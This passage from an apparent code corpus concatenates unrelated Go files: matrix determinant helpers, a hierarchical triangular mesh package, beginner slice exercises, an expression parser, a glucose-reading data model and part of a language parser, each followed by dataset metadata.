	return a[0][0].Mul(a[1][1]).Sub(a[1][0].Mul(a[0][1]))
}
// Det3x3 -- computes the determinant of a 3x3 matrix.
// Built by minor expansion over QQ arithmetic: each m_ij is the 2x2 minor
// taken from slots i and j of the first index and slots 0 and 1 of the
// second index; the minors are then combined (with alternating signs)
// against the entries in slot 2 of the second index.
func Det3x3(a [3][3]QQ) QQ {
	m01 := a[0][0].Mul(a[1][1]).Sub(a[1][0].Mul(a[0][1]))
	m02 := a[0][0].Mul(a[2][1]).Sub(a[2][0].Mul(a[0][1]))
	m12 := a[1][0].Mul(a[2][1]).Sub(a[2][0].Mul(a[1][1]))
	m012 := m01.Mul(a[2][2]).Sub(m02.Mul(a[1][2])).Add(m12.Mul(a[0][2]))
	return m012
}
// Det4x4 -- computes the determinant of a 4x4 matrix.
// Dynamic-programming minor expansion: the 2x2 minors m_ij are built
// first, combined into 3x3 minors m_ijk, and finally into the full
// determinant m0123. Note the 2x2 minors here carry the opposite sign
// convention from Det3x3; the signs in the later combinations account
// for this.
func Det4x4(a [4][4]QQ) QQ {
	m01 := a[1][0].Mul(a[0][1]).Sub(a[0][0].Mul(a[1][1]))
	m02 := a[2][0].Mul(a[0][1]).Sub(a[0][0].Mul(a[2][1]))
	m03 := a[3][0].Mul(a[0][1]).Sub(a[0][0].Mul(a[3][1]))
	m12 := a[2][0].Mul(a[1][1]).Sub(a[1][0].Mul(a[2][1]))
	m13 := a[3][0].Mul(a[1][1]).Sub(a[1][0].Mul(a[3][1]))
	m23 := a[3][0].Mul(a[2][1]).Sub(a[2][0].Mul(a[3][1]))
	m012 := m12.Mul(a[0][2]).Sub(m02.Mul(a[1][2])).Add(m01.Mul(a[2][2]))
	m013 := m13.Mul(a[0][2]).Sub(m03.Mul(a[1][2])).Add(m01.Mul(a[3][2]))
	m023 := m23.Mul(a[0][2]).Sub(m03.Mul(a[2][2])).Add(m02.Mul(a[3][2]))
	m123 := m23.Mul(a[1][2]).Sub(m13.Mul(a[2][2])).Add(m12.Mul(a[3][2]))
	m0123 := m123.Mul(a[0][3]).Sub(m023.Mul(a[1][3])).Add(m013.Mul(a[2][3])).Sub(m012.Mul(a[3][3]))
	return m0123
}
// Det5x5 -- computes the determinant of a 5x5 matrix.
// Same dynamic-programming minor expansion as Det4x4, one level deeper:
// 2x2 minors m_ij -> 3x3 minors m_ijk -> 4x4 minors m_ijkl -> m01234.
func Det5x5(a [5][5]QQ) QQ {
	m01 := a[1][0].Mul(a[0][1]).Sub(a[0][0].Mul(a[1][1]))
	m02 := a[2][0].Mul(a[0][1]).Sub(a[0][0].Mul(a[2][1]))
	m03 := a[3][0].Mul(a[0][1]).Sub(a[0][0].Mul(a[3][1]))
	m04 := a[4][0].Mul(a[0][1]).Sub(a[0][0].Mul(a[4][1]))
	m12 := a[2][0].Mul(a[1][1]).Sub(a[1][0].Mul(a[2][1]))
	m13 := a[3][0].Mul(a[1][1]).Sub(a[1][0].Mul(a[3][1]))
	m14 := a[4][0].Mul(a[1][1]).Sub(a[1][0].Mul(a[4][1]))
	m23 := a[3][0].Mul(a[2][1]).Sub(a[2][0].Mul(a[3][1]))
	m24 := a[4][0].Mul(a[2][1]).Sub(a[2][0].Mul(a[4][1]))
	m34 := a[4][0].Mul(a[3][1]).Sub(a[3][0].Mul(a[4][1]))
	m012 := m12.Mul(a[0][2]).Sub(m02.Mul(a[1][2])).Add(m01.Mul(a[2][2]))
	m013 := m13.Mul(a[0][2]).Sub(m03.Mul(a[1][2])).Add(m01.Mul(a[3][2]))
	m014 := m14.Mul(a[0][2]).Sub(m04.Mul(a[1][2])).Add(m01.Mul(a[4][2]))
	m023 := m23.Mul(a[0][2]).Sub(m03.Mul(a[2][2])).Add(m02.Mul(a[3][2]))
	m024 := m24.Mul(a[0][2]).Sub(m04.Mul(a[2][2])).Add(m02.Mul(a[4][2]))
	m034 := m34.Mul(a[0][2]).Sub(m04.Mul(a[3][2])).Add(m03.Mul(a[4][2]))
	m123 := m23.Mul(a[1][2]).Sub(m13.Mul(a[2][2])).Add(m12.Mul(a[3][2]))
	m124 := m24.Mul(a[1][2]).Sub(m14.Mul(a[2][2])).Add(m12.Mul(a[4][2]))
	m134 := m34.Mul(a[1][2]).Sub(m14.Mul(a[3][2])).Add(m13.Mul(a[4][2]))
	m234 := m34.Mul(a[2][2]).Sub(m24.Mul(a[3][2])).Add(m23.Mul(a[4][2]))
	m0123 := m123.Mul(a[0][3]).Sub(m023.Mul(a[1][3])).Add(m013.Mul(a[2][3])).Sub(m012.Mul(a[3][3]))
	m0124 := m124.Mul(a[0][3]).Sub(m024.Mul(a[1][3])).Add(m014.Mul(a[2][3])).Sub(m012.Mul(a[4][3]))
	m0134 := m134.Mul(a[0][3]).Sub(m034.Mul(a[1][3])).Add(m014.Mul(a[3][3])).Sub(m013.Mul(a[4][3]))
	m0234 := m234.Mul(a[0][3]).Sub(m034.Mul(a[2][3])).Add(m024.Mul(a[3][3])).Sub(m023.Mul(a[4][3]))
	m1234 := m234.Mul(a[1][3]).Sub(m134.Mul(a[2][3])).Add(m124.Mul(a[3][3])).Sub(m123.Mul(a[4][3]))
	m01234 := m1234.Mul(a[0][4]).Sub(m0234.Mul(a[1][4])).Add(m0134.Mul(a[2][4])).Sub(m0124.Mul(a[3][4])).Add(m0123.Mul(a[4][4]))
	return m01234
}
package htm
import (
"fmt"
"azul3d.org/lmath.v1"
)
// Tree represents a node contained with an HTM. Indices point into the
// owning HTM's Vertices slice; Children and Parent are indices into the
// owning HTM's Trees slice.
type Tree struct {
	Index int
	Level int
	Indices [3]int
	Children [4]int
	Parent int
}
// Empty reports whether t is an unused (zero) node; real nodes start at
// subdivision level 1, so a Level of 0 marks an uninitialized slot.
func (t Tree) Empty() bool {
	return t.Level == 0
}
// Equals reports whether two nodes are identical field for field.
// Fixed-size arrays are comparable with == in Go, so Indices and
// Children are compared directly instead of element by element.
func (t Tree) Equals(x Tree) bool {
	return t.Index == x.Index && t.Level == x.Level && t.Parent == x.Parent &&
		t.Indices == x.Indices && t.Children == x.Children
}
// HTM stores all nodes of the data structure along with edge data generated during subdivision.
type HTM struct {
	*Edges
	Vertices []lmath.Vec3 // shared vertex pool referenced by Tree.Indices
	Trees []Tree // all nodes; Tree index fields point into this slice
}
// New returns an HTM with the first eight nodes that create an octahedron initialized.
func New() *HTM {
	h := &HTM{
		Edges: &Edges{},
		// The six vertices of the initial octahedron (unit axes).
		Vertices: []lmath.Vec3{
			{0, 0, 1},
			{1, 0, 0},
			{0, 1, 0},
			{-1, 0, 0},
			{0, -1, 0},
			{0, 0, -1},
		},
		// The eight root triangles: four southern (S0-S3), four northern (N0-N3).
		Trees: []Tree{
			{Index: 0, Level: 1, Indices: [3]int{1, 5, 2}}, // S0
			{Index: 1, Level: 1, Indices: [3]int{2, 5, 3}}, // S1
			{Index: 2, Level: 1, Indices: [3]int{3, 5, 4}}, // S2
			{Index: 3, Level: 1, Indices: [3]int{4, 5, 1}}, // S3
			{Index: 4, Level: 1, Indices: [3]int{1, 0, 4}}, // N0
			{Index: 5, Level: 1, Indices: [3]int{4, 0, 3}}, // N1
			{Index: 6, Level: 1, Indices: [3]int{3, 0, 2}}, // N2
			{Index: 7, Level: 1, Indices: [3]int{2, 0, 1}}, // N3
		},
	}
	// initialize edges for root nodes
	for _, tr := range h.Trees {
		i0, i1, i2 := tr.Indices[0], tr.Indices[1], tr.Indices[2]
		h.Edges.Init(i1, i2)
		h.Edges.Init(i0, i2)
		h.Edges.Init(i0, i1)
	}
	return h
}
// TreesNotEmpty returns only the nodes that are in use (nil if none).
func (h *HTM) TreesNotEmpty() []Tree {
	var used []Tree
	for _, tr := range h.Trees {
		if tr.Empty() {
			continue
		}
		used = append(used, tr)
	}
	return used
}
// Indices returns a slice of all vertex indices of the lowest subdivisions.
func (h *HTM) Indices() []uint32 {
	indices := make([]uint32, 0, len(h.Trees))
	// Leaf triangles are the non-empty nodes with no first child.
	for _, t := range h.Trees {
		if !t.Empty() && t.Children[0] == 0 {
			indices = append(indices, uint32(t.Indices[0]), uint32(t.Indices[1]), uint32(t.Indices[2]))
		}
	}
	return indices
}
// VerticesNotEmpty returns all vertices except zero-valued placeholders.
func (h *HTM) VerticesNotEmpty() []lmath.Vec3 {
	var kept []lmath.Vec3
	for _, v := range h.Vertices {
		// Keep any vertex with at least one non-zero component.
		if v.X != 0 || v.Y != 0 || v.Z != 0 {
			kept = append(kept, v)
		}
	}
	return kept
}
// IndicesAt returns the three vertex indices of the node at idx.
func (h *HTM) IndicesAt(idx int) (i0, i1, i2 int) {
	ind := h.Trees[idx].Indices
	return ind[0], ind[1], ind[2]
}
// VerticesAt looks up a node's vertices from its indices.
func (h *HTM) VerticesAt(idx int) (v0, v1, v2 lmath.Vec3) {
	i0, i1, i2 := h.IndicesAt(idx)
	return h.Vertices[i0], h.Vertices[i1], h.Vertices[i2]
}
// VerticesFor looks up a node's vertices for the given node value
// directly, without an index lookup.
func (h *HTM) VerticesFor(t Tree) (v0, v1, v2 lmath.Vec3) {
	return h.Vertices[t.Indices[0]], h.Vertices[t.Indices[1]], h.Vertices[t.Indices[2]]
}
// LevelAt returns a node's subdivision level. The eight root nodes are
// level one; level zero marks an empty slot.
func (h *HTM) LevelAt(idx int) int { return h.Trees[idx].Level }
// EmptyAt identifies if the node at the given index has children. TODO(d) better name
// A node counts as empty when it has no first child, or its first child
// is an unused slot.
func (h *HTM) EmptyAt(idx int) bool {
	return h.Trees[idx].Children[0] == 0 || h.Trees[h.Trees[idx].Children[0]].Empty()
}
// ChildrenAt returns the four child indices of the node at idx, without
// checking whether that node actually has children. TODO(d) better name
func (h *HTM) ChildrenAt(idx int) (a, b, c, d int) {
	ch := h.Trees[idx].Children
	return ch[0], ch[1], ch[2], ch[3]
}
// TexCoords is a convenience method delegating to the package-level
// TexCoords over the non-empty vertices.
func (h *HTM) TexCoords() []float32 {
	return TexCoords(h.VerticesNotEmpty())
}
// TexCoordsPlanar is a convenience method delegating to the package-level
// TexCoordsPlanar over the non-empty vertices.
func (h *HTM) TexCoordsPlanar() []float32 {
	return TexCoordsPlanar(h.VerticesNotEmpty())
}
// SubDivide starts a recursive subdivision along all eight root nodes
// down to the given level. The roots always occupy indices 0-7 (see New),
// so the eight previously copy-pasted calls are folded into one loop.
func (h *HTM) SubDivide(level int) {
	for root := 0; root < 8; root++ {
		SubDivide(h, root, level)
	}
}
// LookupByCart looks up which triangle a given object belongs to by its
// cartesian coordinates. Returns an error when no triangle contains v.
func (h *HTM) LookupByCart(v lmath.Vec3) (Tree, error) {
	i := -1
	// Only one of the eight root lookups will actually recurse.
	for root := 0; root < 8; root++ {
		LookupByCart(h, root, v, &i)
	}
	if i != -1 {
		return h.Trees[i], nil
	}
	return Tree{}, fmt.Errorf("Failed to lookup triangle by given cartesian coordinates: %v", v)
}
// Intersections returns a slice of node indices that fully or partially match a constraint. If a parent
// node fully matches, the parents children will not be returned in the results.
func (h *HTM) Intersections(t Tester) []int {
	var mt []int
	// Test against each of the eight root triangles (indices 0-7).
	for root := 0; root < 8; root++ {
		Intersections(h, root, t, &mt)
	}
	return mt
}
// Compact drops empty vertices and trees.
// NOTE(review): this filters by position without rewriting the index
// fields stored in the remaining nodes, so Tree.Indices/Children may no
// longer line up after compaction — confirm callers only use this when
// the index fields are no longer needed.
func (h *HTM) Compact() {
	h.Vertices = h.VerticesNotEmpty()
	h.Trees = h.TreesNotEmpty()
}
// CullToLevel culls (removes the subdivisions of) every node at the given
// level that currently has children.
func (h *HTM) CullToLevel(lvl int) {
	for i, t := range h.Trees {
		if t.Level == lvl && t.Children[0] != 0 {
			Cull(h, i)
		}
	}
}
Coding Exercise #1
Using a composite literal declare and initialize a slice of type string with 3 elements.
Iterate over the slice and print each element in the slice and its index.
Are you stuck? Do you want to see the solution for this exercise? Click https://play.golang.org/p/CRPEvm-A31h.
Coding Exercise #2
There are some errors in the following Go program. Try to identify the errors, change the code and run the program without errors.
package main
import "fmt"
func main() {
mySlice := []float64{1.2, 5.6}
mySlice[2] = 6
a := 10
mySlice[0] = a
mySlice[3] = 10.10
mySlice = append(mySlice, a)
fmt.Println(mySlice)
}
Are you stuck? Do you want to see the solution for this exercise? Click https://play.golang.org/p/gVw5_PnrM-h.
Coding Exercise #3
1. Declare a slice called nums with three float64 numbers.
2. Append the value 10.1 to the slice
3. In one statement append to the slice the values: 4.1, 5.5 and 6.6
4. Print out the slice
5. Declare a slice called n with two float64 values
6. Append n to nums
7. Print out the nums slice
Are you stuck? Do you want to see the solution for this exercise? Click https://play.golang.org/p/RNWABjmI2Le.
Coding Exercise #4
Create a Go program that reads some numbers from the command line and then calculates the sum and the product of all the numbers given at the command line.
The user should give between 2 and 10 numbers.
Notes:
- the program should be run in a terminal (go run main.go) not in Go Playground
- example:
go run main.go 3 2 5
Expected output: Sum: 10, Product: 30
Are you stuck? Do you want to see the solution for this exercise? Click https://play.golang.org/p/HEaHKVj30qa.
Coding Exercise #5
Consider the following slice declaration: nums := []int{5, -1, 9, 10, 1100, 6, -1, 6}
Using a slice expression and a for loop iterate over the slice ignoring the first and the last two elements.
Print those elements and their sum.
Are you stuck? Do you want to see the solution for this exercise? Click https://play.golang.org/p/GbHEibG1t3p.
Coding Exercise #6
Consider the following slice declaration: friends := []string{"Marry", "John", "Paul", "Diana"}
Using copy() function create a copy of the slice. Prove that the slices are not connected by modifying one slice and notice that the other slice is not modified.
Are you stuck? Do you want to see the solution for this exercise? Click https://play.golang.org/p/wx9qjwBN-qC.
Coding Exercise #7
Consider the following slice declaration: friends := []string{"Marry", "John", "Paul", "Diana"}
Using append() function create a copy of the slice. Prove that the slices are not connected by modifying one slice and notice that the other slice is not modified.
Are you stuck? Do you want to see the solution for this exercise? Click https://play.golang.org/p/v_uzg5V_OvH.
Coding Exercise #8
Consider the following slice declaration:
years := []int{2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010}
Using a slice expression and append() function create a new slice called newYears that contains the first 3 and the last 3 elements of the slice. newYears should be []int{2000, 2001, 2002, 2008, 2009, 2010}
Are you stuck? Do you want to see the solution for this exercise? Click https://play.golang.org/p/QyGtkDU_w_j. | more_code/coding_tasks/slices/tasks.go | 0.872944 | 0.69653 | tasks.go | starcoder |
package ast
import (
"os"
"github.com/fabulousduck/smol/errors"
"github.com/fabulousduck/smol/lexer"
)
//Expression contains tokens in RPN (postfix) form, as produced by the
//shunting-yard conversion in parseExpression.
type Expression struct {
	Tokens []lexer.Token
}
// createExpression wraps an RPN token list in an Expression node.
func createExpression(nodes []lexer.Token) Expression {
	return Expression{Tokens: nodes}
}
//GetNodeName so its valid on the node interface
//and we can ask what type it is later
func (e Expression) GetNodeName() string {
	return "expression"
}
//VariableReference contains the name of a referenced variable during AST generation
type VariableReference struct {
	name string
}
//GetNodeName so its valid on the node interface
//and we can ask what type it is later
func (vr VariableReference) GetNodeName() string {
	return "variableReference"
}
// createVariableReference wraps a variable name in a VariableReference node.
func createVariableReference(name string) VariableReference {
	return VariableReference{name: name}
}
//Operator is a symbol that operates on one or more sides
type Operator struct {
	value string
}
//GetNodeName is a generic function that allows subtypes of a node in the AST
func (o Operator) GetNodeName() string {
	return "operator"
}
//Symbol is a character that is not and operator or a latin character / numeral
type Symbol struct {
	value string
}
//GetNodeName is a generic function that allows subtypes of a node in the AST
func (s Symbol) GetNodeName() string {
	return "symbol"
}
//Litteral is a node type for static values such as integers and string litterals.
//(The "Litteral" spelling is kept for compatibility with existing callers.)
type Litteral struct {
	ltype string
	value string
}
//GetNodeName is a generic function that allows subtypes of a node in the AST
func (l Litteral) GetNodeName() string {
	return "litteral"
}
//CreateLitteral creates a new Litteral struct with the given value and type tag.
func CreateLitteral(value string, ltype string) Litteral {
	return Litteral{value: value, ltype: ltype}
}
//CreateSymbol takes a string and returns it wrapped in a Symbol node.
func CreateSymbol(value string) Symbol {
	return Symbol{value: value}
}
/*
readExpression turns a set of nodes into an expression using shunting yard.
The expression spans the remainder of the current source line.
*/
func (p *Parser) readExpression() Expression {
	expressionLine := p.currentToken().Line
	expressionTokens := []lexer.Token{}
	//gather all tokens of the expression into a slice
	for currTok := p.currentToken(); currTok.Line == expressionLine; currTok = p.currentToken() {
		expressionTokens = append(expressionTokens, currTok)
		p.advance()
		// Last token of the stream still belongs to the expression.
		if !p.nextExists() {
			expressionTokens = append(expressionTokens, p.currentToken())
			break
		}
	}
	// Parse the collected tokens with a fresh sub-parser.
	expressionParser := NewParser(p.Filename, expressionTokens)
	switch len(expressionTokens) {
	case 0:
		// Nothing on the line: report and abort the process.
		errors.ExpectedExpressionError()
		os.Exit(65)
		break
	case 1:
		// A single token must be a literal to form a valid expression.
		if lexer.IsLitteral(expressionTokens[0]) {
			litteralToken := expressionTokens[0]
			return createExpression([]lexer.Token{litteralToken})
		}
		errors.InvalidOperatorError()
		os.Exit(65)
		break
	default:
		return expressionParser.parseExpression()
	}
	// Unreachable in practice: both failing cases above exit the process.
	return createExpression([]lexer.Token{})
}
/*
readExpressionUntil allows for parsing an expression with a defined
symbol as an end boundary.
This is used for when we parse inside of function calls.
Returns the parsed expression and the delimiter value that ended it
(empty string when the token stream ran out first).
*/
func (p *Parser) readExpressionUntil(tokValues []string) (Expression, string) {
	expressionTokens := []lexer.Token{}
	fnContext := false
	delimFound := ""
	for i := 0; i < len(p.Tokens); i++ {
		// Delimiters only terminate the expression outside a call context.
		if containsStr(tokValues, p.currentToken().Value) && !fnContext {
			delimFound = p.currentToken().Value
			break
		}
		// NOTE(review): fnContext is a single boolean, so nested
		// parentheses are not tracked — confirm nested calls cannot occur.
		if p.currentToken().Value == "(" {
			fnContext = true
		}
		if p.currentToken().Value == ")" && fnContext {
			fnContext = false
		}
		expressionTokens = append(expressionTokens, p.currentToken())
		p.advance()
	}
	expressionParser := NewParser(p.Filename, expressionTokens)
	expressionParser.Tokens = expressionTokens
	switch len(expressionTokens) {
	case 0:
		// Nothing before the delimiter: report and abort the process.
		errors.ExpectedExpressionError()
		os.Exit(65)
		break
	case 1:
		// A single token must be a literal to form a valid expression.
		if lexer.IsLitteral(expressionTokens[0]) {
			return createExpression([]lexer.Token{expressionTokens[0]}), delimFound
		}
		errors.InvalidOperatorError()
		os.Exit(65)
		break
	default:
		return expressionParser.parseExpression(), delimFound
	}
	// Unreachable in practice: both failing cases above exit the process.
	return createExpression([]lexer.Token{}), delimFound
}
// parseExpression converts the parser's infix token stream into an RPN
// (postfix) Expression using the shunting-yard algorithm: operands are
// emitted straight to the output queue while operators wait on a stack
// until precedence rules or a parenthesis boundary force them out.
func (p *Parser) parseExpression() Expression {
	operatorStack := []lexer.Token{}
	outputQueue := []lexer.Token{}
	for p.TokensConsumed < len(p.Tokens) {
		token := p.currentToken()
		switch token.Type {
		case "comma":
			// Argument separators carry no meaning in RPN; skip them.
			p.advance()
			break
		case "integer":
			// Operands are emitted immediately.
			outputQueue = append(outputQueue, token)
			p.advance()
			break
		case "less_than":
			fallthrough
		case "greater_than":
			fallthrough
		case "exponent":
			fallthrough
		case "division":
			fallthrough
		case "star":
			fallthrough
		case "plus":
			fallthrough
		case "dash":
			// Pop operators of higher precedence (or equal precedence with
			// left associativity) to the output before pushing this one,
			// never popping past an open parenthesis.
			if len(operatorStack) >= 1 {
				for len(operatorStack) != 0 {
					stackTopAttributes := lexer.GetOperatorAttributes(top(operatorStack).Type)
					tokenAttributes := lexer.GetOperatorAttributes(token.Type)
					hasHigherPrec := top(operatorStack).HasHigherPrec(token)
					eqRule := stackTopAttributes.Precedance == tokenAttributes.Precedance && tokenAttributes.Associativity == "left"
					parenNotTop := top(operatorStack).Type != "left_parenthesis"
					if (hasHigherPrec || eqRule) && parenNotTop {
						outputQueue = append(outputQueue, top(operatorStack))
						operatorStack = (operatorStack)[:len(operatorStack)-1]
					} else {
						break
					}
				}
			}
			operatorStack = append(operatorStack, token)
			p.advance()
			break
		case "left_parenthesis":
			operatorStack = append(operatorStack, token)
			p.advance()
			break
		case "right_parenthesis":
			// Flush operators back to (and including) the matching "(".
			for top(operatorStack).Value != "(" {
				outputQueue = append(outputQueue, top(operatorStack))
				operatorStack = (operatorStack)[:len(operatorStack)-1]
			}
			if top(operatorStack).Value == "(" {
				operatorStack = (operatorStack)[:len(operatorStack)-1]
			}
			p.advance()
			break
		case "character":
			fallthrough
		case "string":
			// A name followed by "(" is emitted as an operand (function
			// call); any other name is pushed onto the operator stack.
			if p.nextExists() && p.nextToken().Type == "left_parenthesis" {
				outputQueue = append(outputQueue, token)
			} else {
				operatorStack = append(operatorStack, token)
			}
			p.advance()
			break
		}
	}
	// Drain any remaining operators into the output queue, top first.
	if len(operatorStack) != 0 {
		for i := len(operatorStack); 0 < i; i-- {
			outputQueue = append(outputQueue, operatorStack[i-1])
			operatorStack = (operatorStack)[:len(operatorStack)-1]
		}
	}
	return createExpression(outputQueue)
}
// top returns the last (most recently pushed) token of the stack slice
// without removing it; callers must ensure sl is non-empty.
func top(sl []lexer.Token) lexer.Token {
	return sl[len(sl)-1]
}
// containsStr reports whether b occurs in the slice a.
func containsStr(a []string, b string) bool {
	for _, s := range a {
		if s == b {
			return true
		}
	}
	return false
}
package apimodel
import (
"errors"
"fmt"
"github.com/alexandre-normand/glukit/app/util"
"time"
)
// Tag and unit identifiers attached to exported glucose reads.
const (
	GLUCOSE_READ_TAG = "GlucoseRead"
	// Units
	MMOL_PER_L = "mmolPerL"
	MG_PER_DL = "mgPerDL"
	UNKNOWN_GLUCOSE_MEASUREMENT_UNIT = "Unknown"
)
type GlucoseUnit string
// GlucoseRead represents a CGM read (not to be confused with a MeterRead which is a calibration value from an external
// meter
type GlucoseRead struct {
	Time Time `json:"time" datastore:"time,noindex"`
	Unit GlucoseUnit `json:"unit" datastore:"unit,noindex"`
	Value float32 `json:"value" datastore:"value,noindex"`
}
// DayOfGlucoseReads holds the reads for a whole day together with the
// time boundaries of the batch.
type DayOfGlucoseReads struct {
	Reads []GlucoseRead `datastore:"reads,noindex"`
	StartTime time.Time `datastore:"startTime"`
	EndTime time.Time `datastore:"endTime"`
}
// NewDayOfGlucoseReads wraps a batch of reads with its boundaries: the
// first read's time truncated to the day-of-data duration, and the last
// read's time. Assumes reads is time-ordered and non-empty (an empty
// slice panics) — TODO confirm callers guarantee this.
func NewDayOfGlucoseReads(reads []GlucoseRead) DayOfGlucoseReads {
	return DayOfGlucoseReads{reads, reads[0].GetTime().Truncate(DAY_OF_DATA_DURATION), reads[len(reads)-1].GetTime()}
}
// GetTime gets the time of a Timestamp value
func (element GlucoseRead) GetTime() time.Time {
	return element.Time.GetTime()
}
// GetNormalizedValue gets the value converted to the requested unit.
// Conversion factors used: 1 mg/dL * 0.0555 -> mmol/L and
// 1 mmol/L * 18.0182 -> mg/dL. Values with an unknown source unit are
// returned unchanged. An error is returned for an unrecognized target
// unit.
func (element GlucoseRead) GetNormalizedValue(unit GlucoseUnit) (float32, error) {
	if unit == element.Unit {
		return element.Value, nil
	}
	if element.Unit == UNKNOWN_GLUCOSE_MEASUREMENT_UNIT {
		return element.Value, nil
	}
	// This switch can focus on only conversion cases because the obvious
	// cases have been sorted out already
	switch unit {
	case MMOL_PER_L:
		// Source must be mg/dL here: equal units were handled above.
		return element.Value * 0.0555, nil
	case MG_PER_DL:
		// Source must be mmol/L here, by the same reasoning.
		return element.Value * 18.0182, nil
	default:
		return -1., errors.New(fmt.Sprintf("Bad unit requested, [%s] is not one of [%s, %s]", unit, MG_PER_DL, MMOL_PER_L))
	}
}
type GlucoseReadSlice []GlucoseRead
// Len implements sort.Interface.
func (slice GlucoseReadSlice) Len() int {
	return len(slice)
}
// Less implements sort.Interface, ordering reads by ascending timestamp.
func (slice GlucoseReadSlice) Less(i, j int) bool {
	return slice[i].Time.Timestamp < slice[j].Time.Timestamp
}
// Swap implements sort.Interface.
func (slice GlucoseReadSlice) Swap(i, j int) {
	slice[i], slice[j] = slice[j], slice[i]
}
// Get returns the glucose value at index i as a float64.
func (slice GlucoseReadSlice) Get(i int) float64 {
	return float64(slice[i].Value)
}
// GetEpochTime returns the read's timestamp in epoch seconds (Timestamp
// is presumably stored in milliseconds, given the division by 1000).
func (slice GlucoseReadSlice) GetEpochTime(i int) (epochTime int64) {
	return slice[i].Time.Timestamp / 1000
}
// ToDataPointSlice converts a GlucoseReadSlice into a generic DataPoint array
// expressed in the requested glucose unit. Formatting or conversion
// failures are propagated via util.Propagate.
func (slice GlucoseReadSlice) ToDataPointSlice(glucoseUnit GlucoseUnit) (dataPoints []DataPoint) {
	dataPoints = make([]DataPoint, len(slice))
	for i := range slice {
		localTime, err := slice[i].Time.Format()
		if err != nil {
			util.Propagate(err)
		}
		// It's pretty terrible if this happens and we crash the app but this is a coding error and I want to know early
		convertedValue, err := slice[i].GetNormalizedValue(glucoseUnit)
		if err != nil {
			util.Propagate(err)
		}
		dataPoint := DataPoint{localTime, slice.GetEpochTime(i), convertedValue, convertedValue, GLUCOSE_READ_TAG, glucoseUnit}
		dataPoints[i] = dataPoint
	}
	return dataPoints
}
var UNDEFINED_GLUCOSE_READ = GlucoseRead{Time{GetTimeMillis(util.GLUKIT_EPOCH_TIME), "UTC"}, "NONE", UNDEFINED_READ} | app/apimodel/glucoseread.go | 0.732113 | 0.400808 | glucoseread.go | starcoder |
package parse
import (
"fmt"
"github.com/orange-lang/orange/pkg/ast"
"github.com/orange-lang/orange/pkg/lexer"
"github.com/orange-lang/orange/pkg/token"
)
// parser wraps a lexeme stream and provides the recursive-descent helpers.
type parser struct {
	stream lexer.LexemeStream
}
// Parse takes a lexeme stream and returns an AST. Consumes the entire
// lexeme stream, and returns a list of errors for each parsing error.
// (The previous named results shadowed the ast package; plain results
// avoid that.)
func Parse(s lexer.LexemeStream) (ast.AST, []error) {
	p := parser{stream: s}
	return p.parse()
}
// parse consumes the whole stream, collecting top-level nodes and one
// error per statement that fails to parse. The named result is called
// tree (not ast) so it no longer shadows the ast package inside the body.
func (p parser) parse() (tree ast.AST, errs []error) {
	errs = []error{}
	for !p.stream.EOF() {
		// Skip blank lines / stray terminators between statements.
		if ok := p.allowFrom(isStatementTerminator); ok {
			continue
		}
		node, err := p.parseNodeWithRecovery()
		if err != nil {
			errs = append(errs, err)
			continue
		}
		tree.Nodes = append(tree.Nodes, node)
	}
	return
}
// parseNodeWithRecovery parses one node followed by a statement
// terminator, converting any panic raised during parsing into a returned
// error so the caller can resynchronize and continue.
func (p parser) parseNodeWithRecovery() (node ast.Node, err error) {
	defer func() {
		if r := recover(); r != nil {
			// NOTE(review): assumes parser panics always carry an error
			// value; a non-error panic would re-panic on this assertion.
			err = r.(error)
		}
	}()
	node = p.parseNode()
	p.expectFrom(isStatementTerminator)
	return node, err
}
// parseBlock parses a `{ ... }` delimited sequence of nodes into a
// BlockStmt, panicking (for recovery upstream) on malformed input.
func (p parser) parseBlock() *ast.BlockStmt {
	p.nextConcrete(token.OpenCurly)
	nodes := []ast.Node{}
	for !p.stream.EOF() {
		// Skip blank lines between statements.
		if ok := p.allowFrom(isStatementTerminator); ok {
			continue
		}
		// Stop at the first token that cannot begin a node (e.g. `}`).
		if ok := p.peekFrom(isNodeToken); !ok {
			break
		}
		nodes = append(nodes, p.parseNode())
		if ok := p.peek(token.CloseCurly); ok {
			break
		}
		p.expectFrom(isStatementTerminator)
	}
	p.expect(token.CloseCurly)
	return &ast.BlockStmt{Nodes: nodes}
}
// isNodeToken reports whether t can begin a statement or an expression.
func isNodeToken(t token.Token) bool {
	return isExpressionToken(t) || isStatementToken(t)
}
// parseNode dispatches to the expression or statement parser based on the
// next token. Anything else consumes the rest of the statement and panics
// (recovered by parseNodeWithRecovery). Uses the idiomatic bare switch
// instead of `switch true`, and returns directly from each case.
func (p parser) parseNode() ast.Node {
	lexeme, _ := p.stream.Peek()
	switch {
	case isExpressionToken(lexeme.Token):
		return p.parseExpr()
	case isStatementToken(lexeme.Token):
		return p.parseStatement()
	default:
		// Error recovery: skip to the terminator so the caller can resume.
		p.consumeUntilTerminator()
		panic(fmt.Errorf("Unexpected lexeme %v; expected statement", lexeme.Value))
	}
}
// isStatementTerminator reports whether t ends a statement.
func isStatementTerminator(t token.Token) bool {
	switch t {
	case token.Semicolon, token.Newline, token.EOF:
		return true
	}
	return false
}
// consumeTerminators skips over any run of consecutive statement terminators.
func (p parser) consumeTerminators() {
	for p.allowFrom(isStatementTerminator) {
		// Do nothing
	}
}
// consumeUntilTerminator discards lexemes up to (but not including) the
// next statement terminator; used for error recovery.
//
// Bug fix: the previous version peeked a single lexeme before the loop
// and tested that same stale token on every iteration, so once it
// entered the loop it drained the entire stream instead of stopping at
// the next terminator. The stream must be re-peeked each iteration.
func (p parser) consumeUntilTerminator() {
	for !p.stream.EOF() {
		lexeme, _ := p.stream.Peek()
		if isStatementTerminator(lexeme.Token) {
			return
		}
		p.stream.Next()
	}
}
// peekFrom reports whether the next lexeme satisfies c, without consuming it.
func (p parser) peekFrom(c func(token.Token) bool) bool {
	lexeme, _ := p.stream.Peek()
	return c(lexeme.Token)
}
// peek reports whether the next lexeme is t, without consuming it.
func (p parser) peek(t token.Token) bool {
	lexeme, _ := p.stream.Peek()
	return lexeme.Token == t
}
// allowFrom consumes the next lexeme if and only if it satisfies c,
// reporting whether it did.
func (p parser) allowFrom(c func(token.Token) bool) bool {
	if lexeme, _ := p.stream.Peek(); c(lexeme.Token) {
		p.stream.Next()
		return true
	}
	return false
}
// allow consumes the next lexeme if and only if it is t, reporting
// whether it did.
func (p parser) allow(t token.Token) bool {
	if lexeme, _ := p.stream.Peek(); lexeme.Token == t {
		p.stream.Next()
		return true
	}
	return false
}
// expectFrom consumes and returns the next lexeme, panicking (recovered
